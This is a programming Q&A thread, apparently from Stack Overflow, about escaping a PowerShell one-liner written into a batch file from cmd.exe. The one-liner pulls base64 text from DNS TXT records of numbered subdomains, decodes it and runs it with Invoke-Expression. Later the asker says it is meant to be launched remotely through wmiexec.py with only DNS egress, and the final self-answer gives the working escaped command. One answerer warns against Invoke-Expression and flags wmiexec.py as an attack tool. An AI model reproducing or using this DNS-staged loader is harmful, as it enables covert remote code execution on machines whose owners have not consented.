# Piping Set string and escaping in CMD

Tags: powershell, cmd.exe, pipe

I'm trying to do:

```
echo|set /P="powershell "$b64=""; (1..2) | ForEach-Object { $b64+=(nslookup -q=txt "$_.somedomain.com")[-1] };    
iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace('\t|"',"")))))" >> run.bat
```

but keep getting:

`'ForEach-Object' is not recognized as an internal or external command, operable program or batch file.`

I have tried a variety of escapes for `\"` and `^"`, `^|`, etc but keep getting same results.

Comment: You are attempting to mix powershell cmdlets in with cmd.exe commands. That isn't going to work.

Comment: Also.. ms-dos has nothing to do with any of this.  cmd.exe is not ms-dos.

Answer (score 0):

#### 'ForEach-Object' is not recognized as an internal or external command,

You are mixing up batch commands and PowerShell commands.

`ForEach-Object` is a PowerShell command so it needs to be run in a PowerShell window or a PowerShell script (`.ps1` file).

---

#### What I'm trying to do, is get it to write a batch file that'll run powershell command

You are over complicating things.

Write your PowerShell commands in a script file, for example `myscript.ps1`

Then create a batch file, `run.cmd`, that contains the following:

```
PowerShell myscript.ps1
```

Simple and effective.

Comment: Answer updated.

Comment: No, that's not a solution.  I'm happy to write a powershell script, but it needs to be done so by a batch file, so that it can be scripted.  i.e. echo|set /P="$b64=""; (1..2) | ForEach-Object { $b64+=(nslookup -q=txt "$_.somedomain.com")[-1] };    
iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace('\t|"',"")))))" >> powershell.ps1

Comment: you see I'm locked down to a cmd.exe only, and do not have access to an editor, so how else can I create powershell.ps1 ?

Answer (score 0):

As for ...

> I'm happy to write a powershell script, but it needs to be done so by
>   a batch

... no, it does not. It can be done in any text editor, just like you can with virtually any language. Well, as long as you are not looking for assisted guidance (aka IntelliSense) while you are typing/debugging code.

It may have to be called form a .bat/.cmd file. You are confusing development vs execution. Dev .ps1 is whatever tool you want. It's just a text file.

> You cannot run .ps1 file natively from cmd.exe without calling
>   powershell.exe from the bat file.

cmd.exe has no idea what a .ps1 is and will not run it, nor will Windows automatically start powershell.exe for you. You must explicitly call it. There is no other way, that is by design.

Any text editor can be used for script files. It does not matter what script language you are using. Yet, not using a real editor, means you have to manually lookup command info, names, parameters, etc., online.

As for what you are showing, and btw, don't put code in the comment section, update your post question using proper formatting so it can be more easily dealt with.

This is pure cmd.exe stuff and of course, cmd.exe will run it.

```
echo|set /P="$b64=""
```

When using PowerShell 'echo' is an alias for Write-Host and mostly not really needed to send output to the screen, since output to the screen is PowewrShells' default, unless you tell it to do otherwise and this is not the way to set variables in PowerShell. There is no need for the echo|set /P thing at all. You just need the variable name...

```
$b64=""
```

...with whatever value you need in the quotes

PowerShell has reserved special characters, that the semicolon is a terminator that means anything to the left and right of the semicolon are completely separate code blocks and will run independently.

```
';'
```

Using a semicolon in PowerShell with code all on the same line does not make it a ONe-Liner, nor does it send results from the left side of the semicolon to the right, as pipeline '|' do.

This is you send an array/collection to a PowerShell loop, without ever calling PowerShell, and thus will not work, period. Again, because cmd.exe has no idea what this stuff is and since powershell.exe is not running, you cannot use PowerShell code.

You have to run powershell.exe and pass all this as a command string to it or have it save as a .ps1, and simply start powershell.exe and call the .ps1 file. Point of note, it is a very bad practice to use Invoke-Expression (iex). There are many articles on why it should not be used, that have been public, even directly from the MS PowerShell team for years, with even discussion in 2018 about killing it off altogether.

***From the MS PowerShell Team***

> June 3rd, 2011
>
> [Invoke-Expression considered harmful](https://devblogs.microsoft.com/powershell/invoke-expression-considered-harmful)
>
> So what’s wrong with Invoke-Expression then?
>
> - It complicates getting quoting right
> - It makes maintaining your script harder
> - It’s slower than the alternatives
> - ***And maybe worst of all – it opens up a script to code injection    attacks***
>
> [Provide guidance on when to avoid/use Invoke-Expression](https://github.com/MicrosoftDocs/PowerShell-Docs/issues/2679)
>
> [Invoke-Expression is Evil](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/invoke-expression-is-evil)
>
> [Why Invoke-Expression is Evil](https://community.idera.com/database-tools/powershell/powertips/b/tips/posts/why-invoke-expression-is-evil)

```
(1..2) | ForEach-Object { $b64+=(nslookup -q=txt "$_.somedomain.com")[-1] }; iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace('\t|"',"")))))"
```

This...

> > powershell.ps1

...says, you are trying to construct a command in cmd.exe, that has PowerShell code and save that command as a .ps1. This is making you work hard for no real valid reason.

1. Open notepad
2. Copy this into a notepad file

   (1..2) | ForEach-Object { $b64+=(nslookup -q=txt "$_.somedomain.com")[-1] }; iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace('\t|"',"")))))"
3. save it as a SomeFileName.ps1

Then run the script as normal, even using  .bat/.cmd file that really will only have two lines in it.

```
echo|set /P="$b64=""
powershell -file "D:\temp\test.ps1"
```

Save that as a .bat/.cmd, double-click as normal to run.

Or just one line in the .bat/.cmd file as you seem to show in the comment, done this way.

```
powershell.exe -noprofile echo|set /P="$b64=""; (1..2) | ForEach-Object { $b64+=(nslookup -q=txt "$_.somedomain.com")[-1] }; iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace('\t|"',"")))))"
```

Point of note, either way, that command is not syntactically correct. The Quotes do not all lineup. Had you used a PowerShell editor, the built-in IntelliSense, would have alerted you to that, and every Windows box that is running Windows PowerShell 2x or higher has a built-in PowerShell editor, called powershell_ise.exe in the same folder as powershell.exe. There are even free online PowewrSHell editors for scripts and GUI development.

> https://poshgui.com

So, there is really no excuse for not using a true PowerShell editor, except by choice.

You can not double-click a .ps1 and expect it to run. By design, .ps1 are only seen/registered as text files, and as noted have to be called via powershell.exe explicitly.

This is also why folks are using .bat/cmd file to launch .ps1.

You can change this, but as a best practice, just don't as it can lead to RPEs (resume producing events). Quite frankly, I've always taken the position the .bat/.cmd/.vbs, should all bet set not to autorun by double-click, etc.

It's double-clicking or single-clicking on stuff that causes all the risks we had/have to deal with for decades and future.

Read these or view videos on Youtube on the topic.

> PowerShell command-line options
>
> https://docs.microsoft.com/en-us/powershell/scripting/components/console/powershell.exe-command-line-help?view=powershell-7
>
> Invoking a PowerShell script from cmd.exe (or Start | Run)
>
> https://poshoholic.com/2007/09/27/invoking-a-powershell-script-from-cmdexe-or-start-run
>
> How-to: Run a PowerShell script
>
> https://ss64.com/ps/syntax-run.html

Comment: Thanks for taking the time and a thorough answer!  The context here, was to execute the script remotely, through wmiexec.py, and without access to any SMB or any other download medium upstream (HTTP/S etc) only DNS.  The command needed to offer flexibility / be changeable.. which DNS provides enough scope for.

Comment: No worries. RUnning command remotely is what PowerShell Remoting is for. No need for anything else, unless you need to do something in the context of the logged-on use, which will need 3rdP tool help,  like MSSysInternals psexec.exe. PSRemoting must be enable in domain mode or workgroup mode to use it, but there are a few commands yo can use without enabling PSRemoting. You said .bat/.cmd, but now you are saying you are using Python. Yon can call .ps1 code directly from Python and vice versa, without the need for .bat/cmd at all, that is documented on line as well.

Comment: Lastly, as one who has gone through several risk management/security courses-certifications and doing such roles as well, wmiexec.py (to launch semi-interactive remote shells) is one of those tools regularly used by Red/Blue teams and nefarious folks in attack scenarios/validation. If I saw this being used, all kinds of alerts would/should be going off. Use the native PSRemoting, with full auditing so this can be monitored and reported on.

Answer (score 0):

I got it to work in the end..  Key was single quotes.

```
echo 'powershell "$b64=\"\"; (1..2) | ForEach-Object { $b64+=(nslookup -q=txt \"$_.somedomain.com\")[-1] }; iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String(($b64 -replace('\t|'\'",\"\")))))"' > C:\run.bat
```